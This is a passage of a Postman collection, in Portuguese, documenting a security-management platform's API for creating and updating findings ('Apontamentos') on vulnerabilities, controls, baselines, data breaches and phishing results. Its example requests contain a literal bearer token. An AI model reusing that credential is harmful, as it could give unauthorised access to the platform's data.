Ligado.</p>\n"},{"key":"link.link_type","value":"String","type":"text","description":"<p>\"CAUSES\", \"IS_CAUSED_BY\", \"RELATES_TO\", \"DUPLICATES\", \"IS_DUPLICATED_BY\", \"BLOCKS\", \"IS_BLOCKED_BY\".</p>\n"},{"key":"project_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Projetos.</p>\n"},{"key":"base_stauts","value":"String","type":"text","description":"<p>\"OPEN\", \"CLOSE\", \"NONE\".</p>\n"},{"key":"service_desks","value":"List<Object>","type":"text","description":"<p>Lista de Objetos de Service Desks.</p>\n"},{"key":"service_desks.service_desk_tool","value":"String","type":"text","description":"<p>\"JIRA\".</p>\n"},{"key":"service_desks.ticket_key","value":"String","type":"text","description":"<p>Chaves de Tickets.</p>\n"},{"key":"service_desks.url","value":"String","type":"text","description":"<p>URL.</p>\n"},{"key":"vulnerability","value":"Object","type":"text","description":"<p>[Required] Objeto de Vulnerabilidade.</p>\n"},{"key":"vulnerability.status","value":"String","type":"text","description":"<p>\"NONEXISTENT\", \"NOT_EXECUTED\", \"FIXED\", \"ACCEPT\", \"RETEST\", \"TREATMENT\", \"REOPENED\", \"PENDING\".</p>\n"},{"key":"vulnerability.impact","value":"Float","type":"text","description":"<p>Impacto da vulnerabilidade.</p>\n"},{"key":"vulnerability.probability","value":"Float","type":"text","description":"<p>Valor da probabilidade da vulnerabilidade.</p>\n"},{"key":"vulnerability.confidentiality","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.integrit","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.availability","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.attack_vector","value":"String","type":"text","description":"<p>\"NA\", \"PHYSICAL_ACCESS\", \"LOCAL_ACCESS\", \"ADJACENT_NETWORK\", \"LOCAL_NETWORK\".</p>\n"},{"key":"vulnerability.attack_complexity","value":"String","type":"text","description":"<p>\"NA\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.privileges_required","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.user_interaction","value":"String","type":"text","description":"<p>\"NONE\", \"REQUIRED\".</p>\n"},{"key":"vulnerability.cvss_score","value":"Float","type":"text","description":"<p>Pontuação Cvss.</p>\n"},{"key":"vulnerability.cves","value":"List<String>","type":"text","description":"<p>Lista de CVEs.</p>\n"},{"key":"vulnerability.cwes","value":"List<String>","type":"text","description":"<p>Lista de CWEs.</p>\n"},{"key":"vulnerability.exploits","value":"List<Object>","type":"text","description":"<p>Lista de Objetos de Exploits.</p>\n"},{"key":"vulnerability.exploits.name","value":"String","type":"text","description":"<p>Nome do Exploit.</p>\n"},{"key":"vulnerability.exploits.date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.exploits.verified","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o exploit já foi verificado.</p>\n"},{"key":"vulnerability.exploits.url","value":"String","type":"text","description":"<p>URL do exploit.</p>\n"},{"key":"vulnerability.zero_day","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se é o dia zero da vulnerabilidade.</p>\n"},{"key":"vulnerability.products","value":"List<Objects>","type":"text","description":"<p>Lista de Objeto de Produtos.</p>\n"},{"key":"vulnerability.products.vendor","value":"String","type":"text","description":"<p>Nome do Fornecedor.</p>\n"},{"key":"vulnerability.products.name","value":"String","type":"text","description":"<p>Nome do Produto.</p>\n"},{"key":"vulnerability.products.version","value":"String","type":"text","description":"<p>Versão do Produto.</p>\n"},{"key":"vulnerability.patch_available","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Patch Available.</p>\n"},{"key":"vulnerability.patch_available.name","value":"String","type":"text","description":"<p>Nome do Patch disponível.</p>\n"},{"key":"vulnerability.patch_available.apply_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.patch_available.applied","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o patch já foi aplicado,</p>\n"},{"key":"vulnerability.patch_available.release_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.host","value":"Object","type":"text","description":"<p>Objeto de Host.</p>\n"},{"key":"vulnerability.host.port","value":"Integer","type":"text","description":"<p>Porta do host.</p>\n"},{"key":"vulnerability.host.protocol","value":"String","type":"text","description":"<p>Protocolo do host.</p>\n"},{"key":"vulnerability.host.service","value":"String","type":"text","description":"<p>Serviço do host.</p>\n"},{"key":"vulnerability.app","value":"Object","type":"text","description":"<p>Objeto de App.</p>\n"},{"key":"vulnerability.app.httpMethod","value":"String","type":"text","description":"<p>\"GET\", \"HEAD\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\", \"OPTIONS\", \"TRACE\", \"NA\", \"NE\".</p>\n"},{"key":"vulnerability.app.path","value":"String","type":"text","description":"<p>Path do App.</p>\n"},{"key":"vulnerability.app.parameter","value":"String","type":"text","description":"<p>Parâmetro do App.</p>\n"},{"key":"vulnerability.app.request","value":"Object","description":"<p>Objeto de Request.</p>\n","type":"text"},{"key":"vulnerability.app.requests.request_body","value":"String","description":"<p>Body do Request.</p>\n","type":"text"},{"key":"vulnerability.app.requests.request_header","value":"String","description":"<p>Header do Request.</p>\n","type":"text"},{"key":"vulnerability.app.requests.response_body","value":"String","description":"<p>Body do Response.</p>\n","type":"text"},{"key":"vulnerability.app.requests.response_header","value":"String","description":"<p>Header do Response.</p>\n","type":"text"},{"key":"vulnerability.exploit_available","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se há exploits disponíveis.</p>\n"},{"key":"control","value":"Objetct","description":"<p>Objeto de Controle.</p>\n","type":"text"},{"key":"control.status","value":"String","description":"<p>\"IMPLEMENTED\", \"NOT_IMPLEMENTED\", \"NOT_SURE\", \"NOT_APPLICABLE\".</p>\n","type":"text"},{"key":"control.approved","value":"Boolean","description":"<p>Valor Booleano. Indica se o Controle foi Aprovado.</p>\n","type":"text"},{"key":"baseline","value":"String","description":"<p>Objeto de Baseline.</p>\n","type":"text"},{"key":"baseline.audit_name","value":"String","description":"<p>Audit Name.</p>\n","type":"text"},{"key":"baseline.check_id","value":"String","description":"<p>Check ID.</p>\n","type":"text"},{"key":"baseline.check_value","value":"String","description":"<p>Valor de Check.</p>\n","type":"text"},{"key":"baseline.status","value":"String","description":"<p>\"PASSED\", \"ERROR\", \"FAILED\", \"WARNING\".</p>\n","type":"text"},{"key":"baseline.audit_file","value":"String","description":"<p>Audit File.</p>\n","type":"text"},{"key":"baseline.check_info","value":"String","description":"<p>Informações de Check.</p>\n","type":"text"},{"key":"data_breach","value":"Object","description":"<p>Objeto de Violação de Dados.</p>\n","type":"text"},{"key":"data_breach.domain","value":"String","description":"<p>Dominios.</p>\n","type":"text"},{"key":"data_breach.paste_url","value":"String","description":"<p>URLs.</p>\n","type":"text"},{"key":"data_breach.breach_date","value":"String","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"data_breach.verified","value":"Boolean","description":"<p>Valor Booleano. Indica se violação de dados foi verificada.</p>\n","type":"text"},{"key":"data_breach.breached_accounts","value":"Integer","description":"<p>Número de Contas Violadas.</p>\n","type":"text"},{"key":"data_breach.breach_name","value":"String","description":"<p>Nome da violação.</p>\n","type":"text"},{"key":"phishing","value":"Object","description":"<p>Objeto de Phishing.</p>\n","type":"text"},{"key":"phishing.status","value":"String","description":"<p>\"PHISHED\", \"PARTIALLY_PHISED\", \"NOT_PHISHED\", \"NOT_REACHED\", \"AWARE\".</p>\n","type":"text"},{"key":"phishing.viewed","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi visualizado.</p>\n","type":"text"},{"key":"phishing.clicked","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi clicado.</p>\n","type":"text"},{"key":"phishing.downloaded","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi baixado.</p>\n","type":"text"},{"key":"phishing.executed","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi executado.</p>\n","type":"text"},{"key":"phishing.viewed_at","value":"String","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.clicked_at","value":"String","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.downloaded_at","value":"String","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.executed_at","value":"String","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.campaign_name","value":"String","description":"<p>Campaign Names.</p>\n","type":"text"},{"key":"phishing.programs","value":"Object","description":"<p>Objeto de Programas.</p>\n","type":"text"},{"key":"phishing.programs.name","value":"String","description":"<p>Nome  do Programa.</p>\n","type":"text"},{"key":"phishing.programs.location","value":"String","description":"<p>Localização.</p>\n","type":"text"},{"key":"phishing.programs.completionDate","value":"String","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.programs.minimumScore","value":"Float","description":"<p>Pontuação Mínima.</p>\n","type":"text"},{"key":"phishing.programs.actualScore","value":"Float","description":"<p>Pontuação.</p>\n","type":"text"},{"key":"risk_id","value":"String","description":"<p>Risk ID.</p>\n","type":"text"}]},"url":"https://<instance>/api/v2/issues/<issue_id>","description":"<p>Este endpoint permite que você busque por Apontamentos, baseado em filtros dados. Os Campos são combinados com o operador <strong>OR</strong>.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues","<issue_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"af5f833d-cbcd-4f54-ba5b-d48f9988286c","name":"Tentativa de alterar o KB Id","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"kb_id\": \"6287d0d90d85563be60f5b86\"\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues/6287d0d90d85563c65db1598"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Malformed request body\",\n    \"error_key\": \"error.null.params\",\n    \"message\": \"Malformed request body\"\n}"},{"id":"6b188f95-2336-4001-8f5f-b219257ab31a","name":"Alterar a Severidade","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"severity\": 3,\n    \"vulnerability\":{\n\n    }\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues/6287d0d90d85563c65db1598"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Unix Operating System Unsupported Version Detection\",\n    \"severity\": 3,\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"PENDING\",\n        \"host\": {\n            \"protocol\": \"tcp\"\n        },\n        \"app\": {},\n        \"cvss_score\": 9.7,\n        \"exploit_available\": true\n    },\n    \"control\": {},\n    \"baseline\": {},\n    \"phishing\": {},\n    \"issue_id\": \"6287d0d90d85563c65db1598\",\n    \"kb_id\": \"6287d0d90d85563be60f5b86\",\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"id_gat_detail\": 2685,\n    \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n    \"creation_date\": \"2022-05-20T14:33:13\",\n    \"last_seen_date\": \"2022-05-20T14:33:13\",\n    \"source_scan\": \"GATAPI\",\n    \"base_status\": \"OPEN\",\n    \"data_breach\": {}\n}"},{"id":"cea69c5b-4c04-4474-83d7-effc8caf0ea8","name":"Adicionar Responsible ID","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"responsible_id\": \"5a6b261ee3396a1c61f2c4d4\",\n    \"vulnerability\":{\n\n    }\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues/6287d0d90d85563c65db1598"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Unix Operating System Unsupported Version Detection\",\n    \"severity\": 3,\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"PENDING\",\n        \"host\": {\n            \"protocol\": \"tcp\"\n        },\n        \"app\": {},\n        \"cvss_score\": 9.7,\n        \"exploit_available\": true\n    },\n    \"control\": {},\n    \"baseline\": {},\n    \"phishing\": {},\n    \"issue_id\": \"6287d0d90d85563c65db1598\",\n    \"kb_id\": \"6287d0d90d85563be60f5b86\",\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"id_gat_detail\": 2685,\n    \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n    \"creation_date\": \"2022-05-20T14:33:13\",\n    \"last_seen_date\": \"2022-05-20T14:33:13\",\n    \"responsible_id\": \"5a6b261ee3396a1c61f2c4d4\",\n    \"source_scan\": \"GATAPI\",\n    \"base_status\": \"OPEN\",\n    \"data_breach\": {}\n}"}],"_postman_id":"835ad5f7-b68e-4db3-b8ec-0d2f6d983747"},{"name":"Create a new Issue","id":"42baf5e8-102e-44a8-a7ac-344daade66d7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"formdata","formdata":[{"key":"kb_id","value":"String","type":"text","description":"<p>[Optional] ID de KB Vulnerability. Se for enviado, todas as informações de KB serão usadas para criar o Apontamento. Você pode sobrescrever as informações.</p>\n"},{"key":"source","value":"String","description":"<p>\"MANUAL\", \"NESSUS\", \"ACUNETIX\", \"ARACHNI\", \"QUALYS\", \"CUSTOM_PARSER\", \"NESSUS_AUDIT\", \"TENABLEIO\", \"NEXPOSE\", \"OPENVAS\", \"FORTIFY\", \"LUCY\", \"BURP\", \"APPSCAN\", \"NETSPAKER\", \"NIKTO\", \"WEBINSPECT\", \"W3AF\", \"LEGACY\", \"NMAP\", \"HIBP\", \"GAT\", \"GATAPI\", \"PHISHX\", \"GOPHISH\", \"IBLISS\", \"GAT_DISCOVERY\", \"GAT_SCAN\", \"ALIENVAULT\"</p>\n","type":"text"},{"key":"asset_id","value":"String","type":"text","description":"<p>[Required] ID do ativo relacionado ao Apontamento</p>\n"},{"key":"title","value":"String","type":"text","description":"<p>[Required se \"kb_id\" não existir] Título do apontamento</p>\n"},{"key":"description","value":"String","type":"text","description":"<p>Descrição do apontamento</p>\n"},{"key":"severity","value":"Integer","type":"text","description":"<p>[Required se \"kb_id\" não existir] Inteiro de 0 até 4. Padrão é 0</p>\n"},{"key":"type","value":"String","description":"<p>\"VULNERABILITY\", \"CONTROL\", \"BASELINE\", \"DATA_BREACH\", \"PHISHING\", \"INCIDENT\"</p>\n","type":"text"},{"key":"tags","value":"List<String>","type":"text","description":"<p>Lista de Tags.</p>\n"},{"key":"frameworks","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Frameworks.</p>\n"},{"key":"frameworks.name","value":"List<String>","type":"text","description":"<p>Lista de Nomes.</p>\n"},{"key":"frameworks.items","value":"List<String>","type":"text","description":"<p>Lista de Itens.</p>\n"},{"key":"score","value":"Float","type":"text","description":"<p>Pontuação.</p>\n"},{"key":"recommendation_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Recomendações.</p>\n"},{"key":"mitigation_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Mitigações.</p>\n"},{"key":"test_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Testes.</p>\n"},{"key":"category_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Categorias.</p>\n"},{"key":"root_cause_id","value":"String","type":"text","description":"<p>ID de Causa Raíz.</p>\n"},{"key":"creation_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"due_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"responsible_id","value":"String","type":"text","description":"<p>ID de Responsável.</p>\n"},{"key":"watcher_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Watchers.</p>\n"},{"key":"references","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Referências.</p>\n"},{"key":"references.url","value":"String","type":"text","description":"<p>URL de Referência.</p>\n"},{"key":"references.title","value":"String","type":"text","description":"<p>Título de Referência.</p>\n"},{"key":"comment","value":"String","type":"text","description":"<p>Comentário.</p>\n"},{"key":"links","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Links.</p>\n"},{"key":"link.linked_issue_id","value":"String","type":"text","description":"<p>ID do Apontamento Ligado.</p>\n"},{"key":"link.link_type","value":"String","type":"text","description":"<p>\"CAUSES\", \"IS_CAUSED_BY\", \"RELATES_TO\", \"DUPLICATES\", \"IS_DUPLICATED_BY\", \"BLOCKS\", \"IS_BLOCKED_BY\".</p>\n"},{"key":"project_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Projetos.</p>\n"},{"key":"base_stauts","value":"String","type":"text","description":"<p>\"OPEN\", \"CLOSE\", \"NONE\".</p>\n"},{"key":"service_desks","value":"List<Object>","type":"text","description":"<p>Lista de Objetos de Service Desks.</p>\n"},{"key":"service_desks.service_desk_tool","value":"String","type":"text","description":"<p>\"JIRA\".</p>\n"},{"key":"service_desks.ticket_key","value":"String","type":"text","description":"<p>Chaves de Tickets.</p>\n"},{"key":"service_desks.url","value":"String","type":"text","description":"<p>URL.</p>\n"},{"key":"vulnerability","value":"Object","type":"text","description":"<p>Objeto de Vulnerabilidade.</p>\n"},{"key":"vulnerability.status","value":"String","type":"text","description":"<p>\"NONEXISTENT\", \"NOT_EXECUTED\", \"FIXED\", \"ACCEPT\", \"RETEST\", \"TREATMENT\", \"REOPENED\", \"PENDING\".</p>\n"},{"key":"vulnerability.impact","value":"Float","type":"text","description":"<p>Impacto da vulnerabilidade.</p>\n"},{"key":"vulnerability.probability","value":"Float","type":"text","description":"<p>Valor da probabilidade da vulnerabilidade.</p>\n"},{"key":"vulnerability.confidentiality","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.integrit","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.availability","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.attack_vector","value":"String","type":"text","description":"<p>\"NA\", \"PHYSICAL_ACCESS\", \"LOCAL_ACCESS\", \"ADJACENT_NETWORK\", \"LOCAL_NETWORK\".</p>\n"},{"key":"vulnerability.attack_complexity","value":"String","type":"text","description":"<p>\"NA\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.privileges_required","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.user_interaction","value":"String","type":"text","description":"<p>\"NONE\", \"REQUIRED\".</p>\n"},{"key":"vulnerability.cvss_score","value":"Float","type":"text","description":"<p>Pontuação Cvss.</p>\n"},{"key":"vulnerability.cves","value":"List<String>","type":"text","description":"<p>Lista de CVEs.</p>\n"},{"key":"vulnerability.cwes","value":"List<String>","type":"text","description":"<p>Lista de CWEs.</p>\n"},{"key":"vulnerability.exploits","value":"List<Object>","type":"text","description":"<p>Lista de Objetos de Exploits.</p>\n"},{"key":"vulnerability.exploits.name","value":"String","type":"text","description":"<p>Nome do Exploit.</p>\n"},{"key":"vulnerability.exploits.date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.exploits.verified","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o exploit já foi verificado.</p>\n"},{"key":"vulnerability.exploits.url","value":"String","type":"text","description":"<p>URL do exploit.</p>\n"},{"key":"vulnerability.zero_day","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o exploit já foi verificado.</p>\n"},{"key":"vulnerability.products","value":"List<Objects>","type":"text","description":"<p>Lista de Objeto de Produtos.</p>\n"},{"key":"vulnerability.products.vendor","value":"String","type":"text","description":"<p>Nome do Fornecedor.</p>\n"},{"key":"vulnerability.products.name","value":"String","type":"text","description":"<p>Nome do Produto.</p>\n"},{"key":"vulnerability.products.version","value":"String","type":"text","description":"<p>Versão do Produto.</p>\n"},{"key":"vulnerability.patch_available","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Patch Available.</p>\n"},{"key":"vulnerability.patch_available.name","value":"String","type":"text","description":"<p>Nome do Patch disponível.</p>\n"},{"key":"vulnerability.patch_available.apply_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.patch_available.applied","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o patch já foi aplicado,</p>\n"},{"key":"vulnerability.patch_available.release_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.host","value":"Object","type":"text","description":"<p>[Required se asset Type = HOST ou  CLOUD] Objeto de Host.</p>\n"},{"key":"vulnerability.host.port","value":"Integer","type":"text","description":"<p>[Required se asset Type = HOST ou CLOUD] Porta do host.</p>\n"},{"key":"vulnerability.host.protocol","value":"String","type":"text","description":"<p>Protocolo do host.</p>\n"},{"key":"vulnerability.host.service","value":"String","type":"text","description":"<p>Serviço do host.</p>\n"},{"key":"vulnerability.app","value":"Object","type":"text","description":"<p>[Required se asset Type = APPLICATION] Objeto de App.</p>\n"},{"key":"vulnerability.app.httpMethod","value":"String","type":"text","description":"<p>[Required se asset Type = APPLICATION] \"GET\", \"HEAD\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\", \"OPTIONS\", \"TRACE\", \"NA\", \"NE\".</p>\n"},{"key":"vulnerability.app.path","value":"String","type":"text","description":"<p>[Required se asset Type = APPLICATION] Path do App.</p>\n"},{"key":"vulnerability.app.parameter","value":"String","type":"text","description":"<p>[Required se asset Type = APPLICATION] Parâmetro do App.</p>\n"},{"key":"vulnerability.app.request","value":"Object","type":"text","description":"<p>Objeto de Request.</p>\n"},{"key":"vulnerability.app.requests.request_body","value":"String","type":"text","description":"<p>Body do Request.</p>\n"},{"key":"vulnerability.app.requests.request_header","value":"String","type":"text","description":"<p>Header do Request.</p>\n"},{"key":"vulnerability.app.requests.response_body","value":"String","type":"text","description":"<p>Body do Response.</p>\n"},{"key":"vulnerability.app.requests.response_header","value":"String","type":"text","description":"<p>Header do Response.</p>\n"},{"key":"vulnerability.exploit_available","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se há exploits disponíveis.</p>\n"},{"key":"control","value":"Objetct","type":"text","description":"<p>Objeto de Controle.</p>\n"},{"key":"control.status","value":"String","type":"text","description":"<p>\"IMPLEMENTED\", \"NOT_IMPLEMENTED\", \"NOT_SURE\", \"NOT_APPLICABLE\".</p>\n"},{"key":"control.approved","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Controle foi Aprovado.</p>\n"},{"key":"baseline","value":"String","type":"text","description":"<p>Objeto de Baseline.</p>\n"},{"key":"baseline.audit_name","value":"String","type":"text","description":"<p>Audit Name.</p>\n"},{"key":"baseline.check_id","value":"String","type":"text","description":"<p>Check ID.</p>\n"},{"key":"baseline.check_value","value":"String","type":"text","description":"<p>Valor de Check.</p>\n"},{"key":"baseline.status","value":"String","type":"text","description":"<p>\"PASSED\", \"ERROR\", \"FAILED\", \"WARNING\".</p>\n"},{"key":"baseline.audit_file","value":"String","type":"text","description":"<p>Audit File.</p>\n"},{"key":"baseline.check_info","value":"String","type":"text","description":"<p>Informações de Check.</p>\n"},{"key":"data_breach","value":"Object","type":"text","description":"<p>Objeto de Violação de Dados.</p>\n"},{"key":"data_breach.domain","value":"String","type":"text","description":"<p>Dominios.</p>\n"},{"key":"data_breach.paste_url","value":"String","type":"text","description":"<p>URLs.</p>\n"},{"key":"data_breach.breach_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"data_breach.verified","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se violação de dados foi verificada.</p>\n"},{"key":"data_breach.breached_accounts","value":"Integer","type":"text","description":"<p>Número de Contas Violadas.</p>\n"},{"key":"data_breach.breach_name","value":"String","type":"text","description":"<p>Nome da violação.</p>\n"},{"key":"phishing","value":"Object","type":"text","description":"<p>Objeto de Phishing.</p>\n"},{"key":"phishing.status","value":"String","type":"text","description":"<p>\"PHISHED\", \"PARTIALLY_PHISED\", \"NOT_PHISHED\", \"NOT_REACHED\", \"AWARE\".</p>\n"},{"key":"phishing.viewed","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi visualizado.</p>\n"},{"key":"phishing.clicked","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi clicado.</p>\n"},{"key":"phishing.downloaded","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi baixado.</p>\n"},{"key":"phishing.executed","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi execuado.</p>\n"},{"key":"phishing.viewed_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.clicked_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.downloaded_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.executed_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.campaign_name","value":"String","type":"text","description":"<p>Campaign Names.</p>\n"},{"key":"phishing.programs","value":"Object","type":"text","description":"<p>Objeto de Programas.</p>\n"},{"key":"phishing.programs.name","value":"String","type":"text","description":"<p>Nome  do Programa.</p>\n"},{"key":"phishing.programs.location","value":"String","type":"text","description":"<p>Localização.</p>\n"},{"key":"phishing.programs.completionDate","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.programs.minimumScore","value":"Float","type":"text","description":"<p>Pontuação Mínima.</p>\n"},{"key":"phishing.programs.actualScore","value":"Float","type":"text","description":"<p>Pontuação.</p>\n"},{"key":"risk_id","value":"String","type":"text","description":"<p>Risk ID.</p>\n"}]},"url":"https://<instance>/api/v2/issues","description":"<p>Este endpoint permite que você crie novos Apontamentos.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"42337aa8-3ef3-455e-b005-b1081e486f61","name":"Novo apontamento","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"title\": \"New Os Identification\",\n    \"severity\": 2\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"New Os Identification\",\n    \"severity\": 2,\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"PENDING\",\n        \"host\": {\n            \"protocol\": \"tcp\"\n        },\n        \"app\": {}\n    },\n    \"control\": {},\n    \"baseline\": {},\n    \"phishing\": {},\n    \"issue_id\": \"628670ab0d85567d25e673df\",\n    \"kb_id\": \"628670ab0d85567cbc2e7a73\",\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"id_gat_detail\": 2685,\n    \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n    \"creation_date\": \"2022-05-19T13:30:35\",\n    \"last_seen_date\": \"2022-05-19T13:30:35\",\n    \"source_scan\": \"GATAPI\",\n    